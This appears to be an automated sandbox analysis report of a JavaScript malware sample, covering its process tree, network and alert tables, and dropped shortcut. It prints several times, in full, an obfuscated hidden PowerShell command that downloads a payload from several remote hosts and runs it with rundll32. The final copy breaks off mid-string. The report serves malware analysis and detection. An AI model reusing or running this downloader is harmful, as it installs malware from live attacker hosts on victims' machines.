Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 18, 2023, 9:25 a.m. | May 18, 2023, 9:27 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Fyhri.js" mostness BorderlandDownhearted Achromatise
2208-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA"
2312
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBlACkAKQA7AGkAdwByACAAJABQAGkAbwBuAGUAZAAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHYAYQB0AGYAdQBsAFMAeQBzAHQAZQBtAGkAcwBlAHIALgB1AHAAZwBpAHIAZABzAEIAYQBjAGsAbABpAHMAdABzADsAJABmAGEAcwB0AHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQARQBBAE0AQQBBAHUAQQBEAGMAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAeABBAEMANABBAE4AUQBBADAAQQBBAD0APQAiADsAJABuAG8AbgB2AGEAYwB1AG8AdQBzAG4AZQBzAHMAVAB1AGMAdQBuAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBOAFEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQARQBBAE8AQQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABnAEEAZAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBOAHcAQQA9AGQAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFkAQQBaAFEAQgBzAEEARwA4AEEAZABRAEIAeQBBAEYAUQBBAGEAUQBCAG0AQQBHAFkAQQBaAFEAQgBrAEEAQwA0AEEAZABBAEIAdgBBAEEAPQA9ACIAOwAkAHQAdQByAHAAZQBuAHQAaQBuAGkAYwBBAG4AdABpAG0AbwBuAGEAcgBjAGgAYQBsACAAPQAgACIAQgByAGkAZABhAGwAZQByACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdgBhAHQAZgB1AGwAUwB5AHMAdABlAG0AaQBzAGUAcgAuAHUAcABnAGkAcgBkAHMAQgBhAGMAawBsAGkAcwB0AHMAKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADYANgA1ADIAMwApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAZABnAEIAaABBAEgAUQBBAFoAZwBCADEAQQBHAHcAQQBVAHcAQgA1AEEASABNAEEAZABBAEIAbABBAEcAMABBAGEAUQBCAHoAQQBHAFUAQQBjAGcAQQB1AEEASABVAEEAYwBBAEIAbgBBAEcAawBBAGMAZwBCAGsAQQBIAE0AQQBRAGcAQgBoAEEARwBNAEEAYQB3AEIAcwBBAEcAawBBAGMAdwBCADAAQQBIAE0AQQBMAEEAQgBFAEEARwB3AEEAYgBBAEIAUwBBAEcAVQBBAFoAdwBCAHAAQQBIAE0AQQBkAEEAQgBsAEEASABJAEEAVQB3AEIAbABBAEgASQBBAGQAZwBCAGwAQQBIAEkAQQBPAHcAQgBCAEEARwA0AEEAWgB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBBAD0APQAiADsAJABpAG0AcABlAHIAZgBvAHIAYQB0AGUAZABSAGUAcABlAG4AdABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAEUAQQBkAFEAQgBwAEEARwBjAEEAYwBnAEIAaABBAEcANABBAGQAUQBCAHMAQQBHAEUAQQBjAGcAQQB1AEEASABBAEEAYgB3AEIAcgBBAEcAVQBBAGMAZwBBAD0ATQBvAGUAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATgB3AEEAMABBAEMANABBAE0AUQBBAHkAQQBEAE0AQQBMAGcAQQB4AEEARABVAEEATQB3AEEAPQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAcwBBAGEAUQBCADAAQQBHAFUAQQBaAGcAQgBzAEEASABrAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAG4AQQBIAEkAQQBNAG8AZQB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFkAUQBCAHcAQQBHAFUAQQBjAGcAQgBpAEEARwA4AEEAZQBRAEIAUQBBAEgASQBBAFoAUQBCAHoAQQBIAEEAQQBiAHcAQgB1AEEASABRAEEAWQBRAEIAdQBBAEcAVQBBAGIAdwBCADEAQQBIAE0AQQBiAEEAQgA1AEEAQwA0AEEAWQB3AEIAcwBBAEcAOABBAGQAUQBCAGsAQQBBAD0APQAiADsAJABBAGQAcgBvAGkAdABlAHMAdAAgAD0AIAA0ADQAOwBiAHIAZQBhAGsAOwBBAG4AZwB1AGwAYQByADsAfQBBAG4AZwB1AGwAYQByADsAfQAgAGMAYQB0AGMAaAAgAHsAJABSAGUAdgBlAHIAdABlAHIAQgBhAG4AawBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABNAEEATABnAEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB6AEEAQwA0AEEATQBnAEEAMQBBAEQASQBBAFoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBBAEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAFEAQQAwAEEARABFAEEATABnAEEAeQBBAEQARQBBAE4AdwBBAD0AIgA7ACQAUwB0AHUAZABmAGkAcwBoAGUAcwBDAGUAcgBpAGEAbABpAGEAIAA9ACAAIgBwAHIAZQBwAG8AbgBkAGUAcgBhAHQAZQAiADsAfQB9ACQAYwBoAG8AbgBkAHIAZQBjAHQAbwBtAHkAIAA9ACAANwA0ADgAOwBBAG4AZwB1AGwAYQByADsA" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABmAGwAYQBtAGwAZQBzAHMAIAA9ACAANQA0ADkAOwAkAGcAYQBzAHQAZQByAG8AegBvAG8AaQBkAFYAaQBuAGQAaQBjAGEAdABvAHIAIAA9ACAAIgBBAG0AcAB1AHQAYQB0AGUAZABKAGUAZABjAG8AYwBrACIAOwAkAFQAZQBsAGUAcwBjAG8AcABpAGMAYQBsACAAPQAgACIAUAByAGUAbABhAHQAaQBjAGEAbABuAGUAcwBzAEMAYQBuAGMAZQBsACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABTAHQAcgBhAGkAdABzAG0AZQBuAFIAaABvAG0AYgBvAGgAZQBkAHIAYQBsACAAPQAgADIAMAA2ADsAJABNAG8AcwBrAGUAbgBlAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AQQBBAHUAQQBEAEkAQQBOAFEAQQAxAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAGcAQQBNAFEAQQB2AEEARwAwAEEAYQBRAEIAUwBBAEMAOABBAFkAdwBCAHEAQQBHAGsAQQBUAEEAQgBRAEEASABBAEEAUwBRAEIAVQBBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATwBRAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATABnAEEANQBBAEQARQBBAEwAdwBCAFkAQQBHADQAQQBaAEEAQQB2AEEARgBjAEEAYgB3AEIAdgBBAEUATQBBAGEAZwBCADEAQQBIAG8AQQBTAFEAQgBDAEEARQBRAEEAdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEATAB3AEEANQBBAEUAYwBBAFUAUQBBADEAQQBFAEUAQQBPAEEAQQB2AEEARQA4AEEAVABnAEIAUABBAEUAcwBBAGUAUQBCAHQAQQBIAGcAQQBiAHcAQgB2AEEARwA0AEEAUgBnAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABzAGwAdQBnAGwAaQBrAGUAIABpAG4AIAAkAE0AbwBzAGsAZQBuAGUAZQByACAALQBzAHAAbABpAHQAIAAiAHUAIgApACAAewAkAEQAaQBzAHMAZQB2AGUAcgBzACAAPQAgADYANgAwADsAdAByAHkAIAB7ACQAVwBhAGIAcgBvAG4AVwBvAG8AaQBuAGcAIAA9ACAAIgBNAGkAcwBsAGkAdgBlAGQARABpAHAAbABvAGsAYQByAHkAbwBuACIAOwAkAG8AdQB0AHQAaABvAHUAZwBoAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBaAEEAQgB5AEEARwA4AEEAYwB3AEIAegBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQQB1AEEASABBAEEAYQBBAEIANQBBAEgATQBBAGEAUQBCAHYAQQBBAD0APQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAVQBBAE0AdwBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAawBBAEwAZwBBADUAQQBEAFUAQQBuAHYAcgBLAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgATQBBAGQAQQBCAGwAQQBHADgAQQBjAEEAQgBzAEEARwBFAEEAYwB3AEIAMABBAEcAawBBAFoAUQBCAHoAQQBDADQAQQBkAEEAQgBoAEEASABnAEEAbgB2AHIASwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBhAEEAQgBsAEEARwBFAEEAWgBBAEIAbABBAEgASQBBAEwAZwBCAGkAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAQwBoAG8AbgBkAHIAbwBjAGwAYQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBjAEEAQgB2AEEARwB3AEEAZQBRAEIAegBBAEcAVQBBAGMAdwBBAHUAQQBHAE0AQQBhAFEAQgAwAEEASABrAEEAIgA7ACQAUABpAG8AbgBlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBsAHUAZwBsAGkAawBl